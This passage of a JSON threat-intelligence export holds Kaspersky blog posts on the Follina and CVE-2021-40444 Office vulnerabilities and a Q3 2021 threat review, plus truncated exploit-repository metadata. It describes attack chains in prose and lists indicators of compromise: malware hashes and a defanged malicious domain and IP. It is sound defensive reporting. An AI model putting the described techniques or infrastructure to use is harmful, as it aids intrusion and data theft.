Follina\n\nKaspersky is aware of attempts to exploit the CVE-2022-30190 vulnerability through Microsoft Office documents. Our solutions protect against this using the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) tools. \nThe following verdict names are possible:\n\n * PDM:Exploit.Win32.Generic \n * HEUR:Exploit.MSOffice.Agent.n\n * HEUR:Exploit.MSOffice.Agent.gen \n * HEUR:Exploit.MSOffice.CVE-2017-0199.a\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Exploit.MSOffice.Generic\n\n_Geography of Follina exploitation attempts with Exploit.MSOffice.CVE-2021-40444.a verdict, May 1 \u2013 June 3, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>))_\n\nWe expect to see more Follina exploitation attempts to gain access to corporate resources, including for ransomware attacks and data breaches. Therefore, we continue to closely monitor the situation and improve overall vulnerability detection. In addition, as part of the [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts can detect vulnerability exploitation, investigate attacks and provide clients with all necessary threat-related information. \nTo protect against Follina exploitation, we strongly advise that you follow Microsoft&#x27;s own guidelines: [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>). In particular, to prevent exploitation of this vulnerability, you can disable support for the MSDT URL protocol by taking these steps:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command &quot;reg export HKEY_CLASSES_ROOT\\ms-msdt filename&quot;\n 3. Execute the command &quot;reg delete HKEY_CLASSES_ROOT\\ms-msdt /f&quot;.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T08:00:02", "type": "securelist", "title": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-06T08:00:02", "id": "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "href": "https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-25T08:35:29", "description": "\n\n## Summary\n\nLast week, Microsoft reported the remote code execution vulnerability CVE-2021-40444 in the MSHTML browser engine. According to the company, this vulnerability has already been used in targeted attacks against Microsoft Office users. In attempt to exploit this vulnerability, attackers create a document with a specially-crafted object. If a user opens the document, MS Office will download and execute a malicious script. \nAccording to our data, the same attacks are still happening all over the world. We are currently seeing attempts to exploit the CVE-2021-40444 vulnerability targeting companies in the research and development sector, the energy sector and large industrial sectors, banking and medical technology development sectors, as well as telecommunications and the IT sector. Due to its ease of exploitation and the few published [Proof-of-Concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC), we expect to see an increase in attacks using this vulnerability.\n\n_Geography of CVE-2021-40444 exploitation attempts_\n\nKaspersky is aware of targeted attacks using CVE-2021-40444, and our products protect against attacks leveraging the vulnerability. Possible detection names are:\n\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Trojan.MSOffice.Agent.gen\n * PDM:Exploit.Win32.Generic\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/16133928/02-cve-2021-40444-kedr.png>) \n_Killchain generated by KEDR during execution of CVE-2021-40444 Proof-of-Concept _\n\nExperts at Kaspersky are monitoring the situation closely and improving mechanisms to detect this vulnerability using [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. Within our [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts are able to detect when this vulnerability is expoited, investigate such attacks and notify customers.\n\n## Technical details\n\nThe remote code execution vulnerability CVE-2021-40444 was found in MSHTML, the Internet Explorer browser engine which is a component of modern Windows systems, both user and server. Moreover, the engine is often used by other programs to work with web content (e.g. MS Word or MS PowerPoint). \nIn order to exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing an URL for a malicious script. If a victim opens the document, Microsoft Office will download the malicious script from the URL and run it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim&#x27;s computer. For example, the original zero-day exploit which was used in targeted attacks at the time of detection used ActiveX controls to download and execute a Cobalt Strike payload. We are currently seeing various types of malware, mostly backdoors, which are delivered by exploiting the CVE-2021-40444 vulnerability.\n\n## Mitigations\n\n * Follow [Microsoft security update guidelines.](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)\n * Use the latest [Threat Intelligence information](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) to keep up to date with TTPs used by threat actors.\n * Businesses should use a security solution that provides vulnerability, patch management and exploit prevention components, such as the [Automatic Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component in Kaspersky Endpoint Security for Business. The component monitors suspicious actions in applications and blocks malicious file execution.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, which help identify and stop an attack at an early stage before the attackers achieve their final goal.\n\n## IoC\n\n**MD5** \n[ef32824c7388a848c263deb4c360fd64](<https://opentip.kaspersky.com/ef32824c7388a848c263deb4c360fd64/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[e58b75e1f588508de7c15a35e2553b86](<https://opentip.kaspersky.com/e58b75e1f588508de7c15a35e2553b86/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[e89dbc1097cfb8591430ff93d9952260](<https://opentip.kaspersky.com/e89dbc1097cfb8591430ff93d9952260/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\n**URL** \n[hidusi[.]com](<https://opentip.kaspersky.com/hidusi.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[103.231.14[.]134](<https://opentip.kaspersky.com/103.231.14.134/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {}, "published": "2021-09-16T15:30:57", "type": "securelist", "title": "Exploitation of the CVE-2021-40444 vulnerability in MSHTML", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T15:30:57", "id": "SECURELIST:63306FA6D056BD9A04969409AC790D84", "href": "https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T14:36:44", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named &quot;Guard&quot;. Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims&#x27; identities or environment. It&#x27;s not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too &#x27;noisy&#x27; and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim&#x27;s Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim&#x27;s computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT&#x27;s networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims&#x27; registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware&#x27;s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim&#x27;s iPhone has not been not [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft&#x27;s Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group&#x27;s campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it&#x27;s likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device&#x27;s memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it&#x27;s likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a &quot;lifetime license&quot;).\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that&#x27;s about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven&#x27;t yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky&#x27;s mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user&#x27;s device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim&#x27;s machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It&#x27;s known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 